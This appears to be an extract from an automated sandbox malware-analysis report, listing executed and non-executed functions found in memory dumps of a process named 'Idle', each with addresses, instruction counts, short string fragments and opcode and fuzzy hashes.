                  • Instruction ID: 7dab9857bb1a8245ad7f40edf38ec6acd88202ec85d0be7cffea68f85d0f0654
                  • Opcode Fuzzy Hash: 22923bd621e640c7133f38dc23458d0976882c06cb58bffd4345298d227c5763
                  • Instruction Fuzzy Hash: A4019E30A1951E9FDB98EF64C4656BE77A1FF58308F11447ED41EC31A4CE31A690CB40
                  Function 00007FFD9B9E1CE1 Relevance: .0, Instructions: 48COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1548a17dba947bac706dc97a41ac752fa3adb0d3d52381bfbfe678c2cd3ce7f6
                  • Instruction ID: fefa6685843655be59ced1088c62e2cd9c35231bc77dcf57014547bfdb891ce8
                  • Opcode Fuzzy Hash: 1548a17dba947bac706dc97a41ac752fa3adb0d3d52381bfbfe678c2cd3ce7f6
                  • Instruction Fuzzy Hash: 8201D130A1A68E9FDBA8DF64C8656B93BE0FF19304F4204BAD819C60A2CB759690C740
                  Function 00007FFD9B9E28ED Relevance: .0, Instructions: 47COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0eb901173697d917a8bd1875a0991d48be8fd73d7155a90527ecc4aa66f67862
                  • Instruction ID: 83f6ede8c6d562fb0d7265d2dff0cbecee271581ec47fa41c0a83b8c307c33e8
                  • Opcode Fuzzy Hash: 0eb901173697d917a8bd1875a0991d48be8fd73d7155a90527ecc4aa66f67862
                  • Instruction Fuzzy Hash: 0201B131E2A64E5FE765ABA485685B93BE0FF19300F0615B6D448C60B2EE34E680C701
                  Function 00007FFD9B9EAC59 Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3e2c327ac3872027962bd24802f557e236af06222bfe6185c511be4798713b5c
                  • Instruction ID: 1d81b01347d4d1402811f466a4f034ec0cfbc76842b9843dd768e6027879ebbb
                  • Opcode Fuzzy Hash: 3e2c327ac3872027962bd24802f557e236af06222bfe6185c511be4798713b5c
                  • Instruction Fuzzy Hash: FD018430A5F68D6FE762EB78C8695A97BE0EF19300F0649F6D449C70B2DA28A6448701
                  Function 00007FFD9B9E2F89 Relevance: .0, Instructions: 43COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fa8c301dd31c3d05c06ece76d51ac7e7aab9e38250480758d4a114b9b0bfe5d1
                  • Instruction ID: f75adedd907a5af974dc001f38c417259ab8f80cb7a1c03b938d3cea7a674a79
                  • Opcode Fuzzy Hash: fa8c301dd31c3d05c06ece76d51ac7e7aab9e38250480758d4a114b9b0bfe5d1
                  • Instruction Fuzzy Hash: A201D470A1E64D9FE762A7B488695A97FE0EF09300F1A08F6D448CB0B6DA38A6448301
                  Function 00007FFD9B9E0608 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ad0a1b188dca58be1a40704814c15df120ddc381b99567b006c6be18da97c2cd
                  • Instruction ID: f2b47f119b740828f11d0b39693d4f26a5d45fa7cca3d532fb6357007b11a437
                  • Opcode Fuzzy Hash: ad0a1b188dca58be1a40704814c15df120ddc381b99567b006c6be18da97c2cd
                  • Instruction Fuzzy Hash: DF016D30A2950E9BEB69EFA4C4696BD73A0FF18305F1108BEE41EC21E5DE35A250C600
                  Function 00007FFD9B9E0610 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0848b92742957e33a081aa3debaa48e7f96874c84acac0b24c169103e851c1fc
                  • Instruction ID: 1b7351c42a02252a923b140d61a94eabefd2399653f57160a4bdf7d575330a2e
                  • Opcode Fuzzy Hash: 0848b92742957e33a081aa3debaa48e7f96874c84acac0b24c169103e851c1fc
                  • Instruction Fuzzy Hash: 57013630A1950E9FEB59EFA4C4696B977A0FF18305F51047EE41EC21E5DF35A650C701
                  Function 00007FFD9B9EACC5 Relevance: .0, Instructions: 41COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 338f69a0d0892f5717a8081168ddf47fe7f9ba381a78702eb51cc3c0d86356c0
                  • Instruction ID: 0a2119d536c68663c0df4fe5e9f87ae721708e747f18a0ec3bd2e7a199de0ad2
                  • Opcode Fuzzy Hash: 338f69a0d0892f5717a8081168ddf47fe7f9ba381a78702eb51cc3c0d86356c0
                  • Instruction Fuzzy Hash: A201A925A1F38E5FE362AB7498B51E57BB0DF42314F4605F7D089C60F3D91856488351
                  Function 00007FFD9B9E1230 Relevance: .0, Instructions: 40COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 737bb4f119557b0a352159ac54ab0bab0f83cebbd6c9daf23e9cb170bb07a44f
                  • Instruction ID: b8543e5bc6dae3fada2a6e83d93c0e1bac0418958c6c05d1eb074ea6c992fde2
                  • Opcode Fuzzy Hash: 737bb4f119557b0a352159ac54ab0bab0f83cebbd6c9daf23e9cb170bb07a44f
                  • Instruction Fuzzy Hash: DFF0F470E2A55F5AEFA89BB88C683F977A4FF95208F01003AE41DC21E1DF3453048200
                  Function 00007FFD9B9EAD70 Relevance: .0, Instructions: 40COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 584f52145bba40b0669301cbc45ee37c1a07ef6079c18b1f1d58c64cf0fc81df
                  • Instruction ID: 5d7692e6af646ad1f5ba16b9107d56d5743c8213e3fe986f2e67fdf2332d61d5
                  • Opcode Fuzzy Hash: 584f52145bba40b0669301cbc45ee37c1a07ef6079c18b1f1d58c64cf0fc81df
                  • Instruction Fuzzy Hash: 9DF08130B6B50E9BEB58EB64C4646FE7BA0FF08314F51087ED41ED20E5DE396650C651
                  Function 00007FFD9B9E05D0 Relevance: .0, Instructions: 39COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 41a58968b53d77a8e7d396ad284169fabf74644de5b15f5446ad16667aa55b5a
                  • Instruction ID: 4e5c3e7db3bdb4a6d2e65080491a31a4e1a426d84836ea0df42fc4eb8f8536db
                  • Opcode Fuzzy Hash: 41a58968b53d77a8e7d396ad284169fabf74644de5b15f5446ad16667aa55b5a
                  • Instruction Fuzzy Hash: D5F0C230A1A65E9FEB58EF6484256FA37A0EF05308F11047AE81EC30A1CE35A690CB80
                  Function 00007FFD9B9E0FAE Relevance: .0, Instructions: 38COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 19e31b26a771f9e5b93d9a90cef3f9f8f2772f0a3a24e8999fcb567d45d94678
                  • Instruction ID: 12ff8413082c85d53af232ef4ea27646545d66c404af20eda89966d16f465d13
                  • Opcode Fuzzy Hash: 19e31b26a771f9e5b93d9a90cef3f9f8f2772f0a3a24e8999fcb567d45d94678
                  • Instruction Fuzzy Hash: 5A014B31F1560E8BEB50EB98C890AEEB3B1EB44301F1181B2D409E7294DE35AE448F90
                  Function 00007FFD9B9E2809 Relevance: .0, Instructions: 36COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 561a41e1dc8aaea1ae04ee20678b385ed949e47d0e47501d5dda29b14410bd9d
                  • Instruction ID: 7f8003387244380abd01e4b6f46646d9f5892a842e231b346a7ef4d595c0d78e
                  • Opcode Fuzzy Hash: 561a41e1dc8aaea1ae04ee20678b385ed949e47d0e47501d5dda29b14410bd9d
                  • Instruction Fuzzy Hash: 89F0C23091F78D9FEB6A9F6088251A93BB0BF56200F0644FBD449C60F2DA789648C301
                  Function 00007FFD9B9EB37F Relevance: .0, Instructions: 36COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fd076c52617a7270c0e47ac1f072f272867594fee3e68cd9c9fbf31b576e7cd7
                  • Instruction ID: a73c7652bca1a479f0d4b91665eaa0dea7f7b95f2f2f4cfce5a15b2d7aea0dce
                  • Opcode Fuzzy Hash: fd076c52617a7270c0e47ac1f072f272867594fee3e68cd9c9fbf31b576e7cd7
                  • Instruction Fuzzy Hash: FA011E70E1951E9BEB24DBD0C495AFEB3B1AF54300F214676C40AA2295DF38AB85CB90
                  Function 00007FFD9B9E287D Relevance: .0, Instructions: 33COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ad6db99fef63034ff42d7d0014c19b4ca7126219e6f2df5dd13b998a9f653fb9
                  • Instruction ID: 3c62d3043a46cb08d575bcb585e41e3619b02f54554517446c694dbb70b25984
                  • Opcode Fuzzy Hash: ad6db99fef63034ff42d7d0014c19b4ca7126219e6f2df5dd13b998a9f653fb9
                  • Instruction Fuzzy Hash: 28F0B43091E78D9FE7595FA088246B937A0BF46305F4604BBE819C60E2DB399654C701

                  Non-executed Functions

                  Function 00007FFD9B9EF019 Relevance: 5.1, Strings: 4, Instructions: 55COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: "$)$Y$e
                  • API String ID: 0-363832505
                  • Opcode ID: 15dd0b8adb89b6f08b7213c0716d7ffa65dcee0f3197cd205c399a611c24ca46
                  • Instruction ID: bc8a5ab942acfff6bf3598b6345b66b1f3c7692f45a2d4217a69ad8b01bef24f
                  • Opcode Fuzzy Hash: 15dd0b8adb89b6f08b7213c0716d7ffa65dcee0f3197cd205c399a611c24ca46
                  • Instruction Fuzzy Hash: C8211871E097698FDB68CF50C8647E9BBB1AB44301F0001FEE40DA6291DB785B84CF01

                  Executed Functions

                  Function 00007FFD9BA13655 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: L_H
                  • API String ID: 0-402390507
                  • Opcode ID: d4f97e911231b49fd04a17826f54012f298a1645395f82bbe454777980e9a9e3
                  • Instruction ID: 7f49aa9d55a6531d09e7a122147d259465102c1ed25bd4b1df96c63d7aa93bb9
                  • Opcode Fuzzy Hash: d4f97e911231b49fd04a17826f54012f298a1645395f82bbe454777980e9a9e3
                  • Instruction Fuzzy Hash: 2791D171B1994E8FEB94DF68C8657AC7BE1EF99310F5401BAD01DC72DACBB428058B40
                  Function 00007FFD9BA1EA63 Relevance: 3.9, Strings: 3, Instructions: 137COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: >$N$c
                  • API String ID: 0-2822027293
                  • Opcode ID: 1f7f209dc65dafb90b994379baa6a986a858f8a3067549f79b6b24bbb4023c36
                  • Instruction ID: 6299845d5c67e20c092f955893f3f75fdc271585c3856fd1aebf345e617ddc35
                  • Opcode Fuzzy Hash: 1f7f209dc65dafb90b994379baa6a986a858f8a3067549f79b6b24bbb4023c36
                  • Instruction Fuzzy Hash: 055105B1E0562D8BDBA8DF18C8957A9B7B1FF58301F1041EAE10DE32A1DA746E818F45
                  Function 00007FFD9BA2FDF0 Relevance: 2.9, Strings: 2, Instructions: 363COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: $V_L$&K_L
                  • API String ID: 0-2294561070
                  • Opcode ID: 15117b9f1157809df23488529305b515f2182336f6be3b8ff9a30aa5aefa5a99
                  • Instruction ID: d2905339ec09dae1681ec0c583ef93ee06d6b8fd2b93a9c36a9d56e930d81882
                  • Opcode Fuzzy Hash: 15117b9f1157809df23488529305b515f2182336f6be3b8ff9a30aa5aefa5a99
                  • Instruction Fuzzy Hash: E4C18430B18A1D8FDB98DB58C899AB9B3E2FF55314B1141A9D04EC72A6DE35FC42CB40
                  Function 00007FFD9BA21297 Relevance: 2.6, Strings: 2, Instructions: 54COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: '$/
                  • API String ID: 0-2558154120
                  • Opcode ID: 6c4b0d95dd148fc3eed9dcc87279b88bbacec95ea84a2a458362b6ead6cef6ff
                  • Instruction ID: 13f8ad4be8bbdb78346c0c3d5750e6b75d3656789e7731f04e099d29ad3eab97
                  • Opcode Fuzzy Hash: 6c4b0d95dd148fc3eed9dcc87279b88bbacec95ea84a2a458362b6ead6cef6ff
                  • Instruction Fuzzy Hash: B421F870E4522E8FEF74DF94C890BEDB7B1AB14300F5140BAD40DA7691EAB86A84DF40
                  Function 00007FFD9BA2DD0D Relevance: 1.6, Strings: 1, Instructions: 392COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: >f[I
                  • API String ID: 0-732273335
                  • Opcode ID: c50da29da437ea4191ef3a65d3c501669359a4321020514bd052e692125fa0c4
                  • Instruction ID: e477c1f84570665f254bfcd8c28d9876c065ea57f61d05d33494dc388ae84961
                  • Opcode Fuzzy Hash: c50da29da437ea4191ef3a65d3c501669359a4321020514bd052e692125fa0c4
                  • Instruction Fuzzy Hash: 51515923F0F84A4EF725B7ACA8A65FC7B90EF40364B0902B7D498C60E7DD6569498340
                  Function 00007FFD9BA2DD8F Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: >f[I
                  • API String ID: 0-732273335
                  • Opcode ID: beed100bfd9cc0ec08547c1c3f0cfa19adf6984090b366ff0b111acfee90684e
                  • Instruction ID: 5f41f8af17d46c58a484499a2f828a571bac3f1eade0e803ff621d7fc5f03302
                  • Opcode Fuzzy Hash: beed100bfd9cc0ec08547c1c3f0cfa19adf6984090b366ff0b111acfee90684e
                  • Instruction Fuzzy Hash: 7A313513F4F98A4EF769A7B858662F87B90EF51320F1901BBD4D8860E7DD646A098341
                  Function 00007FFD9BA31992 Relevance: 1.6, Strings: 1, Instructions: 305COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: K_H
                  • API String ID: 0-1997722976
                  • Opcode ID: 052777bd6f8f8d27b041a13b149d67d87f0a568dfd4360589601bc6ff59f1873
                  • Instruction ID: 50fb736e5a9f0682ace8877f09435dfa83194227ee0cbbae4876057f38b349c7
                  • Opcode Fuzzy Hash: 052777bd6f8f8d27b041a13b149d67d87f0a568dfd4360589601bc6ff59f1873
                  • Instruction Fuzzy Hash: 03B1D430B09A4A4FD759DF58C0A06A4B7A1FF64300F5941B9C04EC7A9ADB68B951CB80
                  Function 00007FFD9BA22C64 Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: H
                  • API String ID: 0-2852464175
                  • Opcode ID: 5faed0c4a04fbba5c87b62cd654c763ea339c67fb41365431d14b708424a0bdf
                  • Instruction ID: 229053320abc4fb959ff3b1ac59dfbabd150e1ad64e0717d3e12c7a1899feef1
                  • Opcode Fuzzy Hash: 5faed0c4a04fbba5c87b62cd654c763ea339c67fb41365431d14b708424a0bdf
                  • Instruction Fuzzy Hash: 5C71EA70E1951D8EEBA4EB98C8A5BACB7B1FF58300F1141B9D40DE7292DE746A848F40
                  Function 00007FFD9BA31E68 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID: 0-3916222277
                  • Opcode ID: 91486d68160b1032fb00027bdcbb4a133203684f73ff73bfefae136d0666719f
                  • Instruction ID: 6564b4ca96922e28b01ae35add60601b1cab5635ad8315f5245a0d3f1f610212
                  • Opcode Fuzzy Hash: 91486d68160b1032fb00027bdcbb4a133203684f73ff73bfefae136d0666719f
                  • Instruction Fuzzy Hash: CE517D71E0960E8FDB58DBD8C4A55BDB7B1FF64300F1140BAD01AE72EADA792A05CB50
                  Function 00007FFD9BA1EF63 Relevance: 1.3, Strings: 1, Instructions: 11COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: O
                  • API String ID: 0-878818188
                  • Opcode ID: 26991cf8452ccacfe0d90af19eb0937e8cb1b313dabb00877a0059d338a664d8
                  • Instruction ID: 80887e4341fb0ed60d16821b7880db5043c30d381e3ab6412bcbb257490ec277
                  • Opcode Fuzzy Hash: 26991cf8452ccacfe0d90af19eb0937e8cb1b313dabb00877a0059d338a664d8
                  • Instruction Fuzzy Hash: A9D092B0E09A1D8EDBE0DF68C8557AC76F0BF18304F0000A5D54CD2291CB746A818F48
                  Function 00007FFD9BA1DAA9 Relevance: .4, Instructions: 415COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: acb29d409e68988649a95c85298e44ef2a0c9202577d9ee036fafdbeb3bebd00
                  • Instruction ID: 445d76a0bd3555df708787bbfb3791d93d4451200cdbd0bb5f7341b912a2f832
                  • Opcode Fuzzy Hash: acb29d409e68988649a95c85298e44ef2a0c9202577d9ee036fafdbeb3bebd00
                  • Instruction Fuzzy Hash: 56E16C71E1965D8FEBA8DBA8C4A47B8B7A1FF58301F4540BED05ED72E2CA756940CB00
                  Function 00007FFD9BA33121 Relevance: .4, Instructions: 414COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bf444868c3ed8ca94ca0827d41d792fe147bc5ffdf11046e3031e8da6423eeb3
                  • Instruction ID: e0a4e3a16d93a1797635592b0b3531dc55f6042a8c896aac10210a6a1f2c235e
                  • Opcode Fuzzy Hash: bf444868c3ed8ca94ca0827d41d792fe147bc5ffdf11046e3031e8da6423eeb3
                  • Instruction Fuzzy Hash: B6D1FE30A0EB0B8FE379DBA8D4A117577E1FF54300B15457ED48EC36A2DEA9B9428B41
                  Function 00007FFD9BA320DF Relevance: .4, Instructions: 375COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 88c9112a47cec2af3434e1c156de282ec598e002df5c719136f74c7ff8b5967d
                  • Instruction ID: 307c15fae336906206f9f3798ee46f229847bcdd536ef7d1ad24cda6aa871d75
                  • Opcode Fuzzy Hash: 88c9112a47cec2af3434e1c156de282ec598e002df5c719136f74c7ff8b5967d
                  • Instruction Fuzzy Hash: 5ED1C23061974A8FEB69CF88C4E05B537A1FF45300B5545BDD84B8B69BCA78F981CB80
                  Function 00007FFD9BA25BB0 Relevance: .4, Instructions: 364COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ce69c67c07ee135bae084ec662034af670c6710a274e6de7164319b23b8af77d
                  • Instruction ID: 124bdb54e49d546f5889b50c12efbff185fe12dfd7e1b82d4ca88df0076c76e1
                  • Opcode Fuzzy Hash: ce69c67c07ee135bae084ec662034af670c6710a274e6de7164319b23b8af77d
                  • Instruction Fuzzy Hash: 3DD1B370A4991D8FDBA9EF58C895BE9B7B1FF59300F5100A9D00DE32A5DB75AA80CF40
                  Function 00007FFD9BA320FF Relevance: .3, Instructions: 334COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6be27bf425ce1beb616b18915bb8fe7e5591eb77c706361f25e6c598b443c943
                  • Instruction ID: 25322d30ac2d68166819cf673652a7764b9fcd9dac956c10fe1e0dddca443a29
                  • Opcode Fuzzy Hash: 6be27bf425ce1beb616b18915bb8fe7e5591eb77c706361f25e6c598b443c943
                  • Instruction Fuzzy Hash: E2C1D03061974A8BEB6DCF88C4E05B137A1FF45340B5545BDD88B8B69BCA78F981CB80
                  Function 00007FFD9BA11718 Relevance: .3, Instructions: 292COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 595ade9e22e9958f53db2e5926c12f1454d22247ca2e73592fff857b0ad765fd
                  • Instruction ID: 8c6e8134cd8cdedcdea09ca9bb411f62f6dc76414da184542e39f81906c9b7d2
                  • Opcode Fuzzy Hash: 595ade9e22e9958f53db2e5926c12f1454d22247ca2e73592fff857b0ad765fd
                  • Instruction Fuzzy Hash: 8791EF31B1DA4D4BDB98DF5C88606B977E2EFA8300B1541BAE45EC32D2DE31AD02C781
                  Function 00007FFD9BA34839 Relevance: .2, Instructions: 244COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5d047558d4cccdbcbab7eabeeebf9a104771a7d6f8bb87c1720b9fbd16d6ed64
